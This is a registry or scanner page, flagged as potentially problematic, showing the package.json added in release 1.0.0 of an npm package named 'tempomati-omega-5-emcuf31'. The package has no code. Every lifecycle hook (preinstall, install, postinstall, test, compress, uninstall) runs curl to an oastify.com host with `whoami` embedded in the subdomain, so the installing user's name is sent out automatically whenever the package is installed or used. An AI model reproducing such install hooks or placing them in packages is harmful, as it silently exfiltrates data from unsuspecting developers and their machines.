tempomati-omega-5-emcuf31 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of tempomati-omega-5-emcuf31 might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +18 -0
package/package.json ADDED
@@ -0,0 +1,18 @@
1
+ {
2
+ "name": "tempomati-omega-5-emcuf31",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "curl https://`whoami`.m5su4y7snh9fvntod73qbciis9y1muaj.oastify.com/test",
8
+ "preinstall": "curl https://`whoami`.m5su4y7snh9fvntod73qbciis9y1muaj.oastify.com/preinstall",
9
+ "postinstall": "curl https://`whoami`.m5su4y7snh9fvntod73qbciis9y1muaj.oastify.com/postinstall",
10
+ "precompress": "curl https://`whoami`.m5su4y7snh9fvntod73qbciis9y1muaj.oastify.com/precompress",
11
+ "compress": "curl https://`whoami`.m5su4y7snh9fvntod73qbciis9y1muaj.oastify.com/compress",
12
+ "postcompress": "curl https://`whoami`.m5su4y7snh9fvntod73qbciis9y1muaj.oastify.com/postcompress",
13
+ "install": "curl https://`whoami`.m5su4y7snh9fvntod73qbciis9y1muaj.oastify.com/install",
14
+ "uninstall": "curl https://`whoami`.m5su4y7snh9fvntod73qbciis9y1muaj.oastify.com/uninstall"
15
+ },
16
+ "author": "",
17
+ "license": "ISC"
18
+ }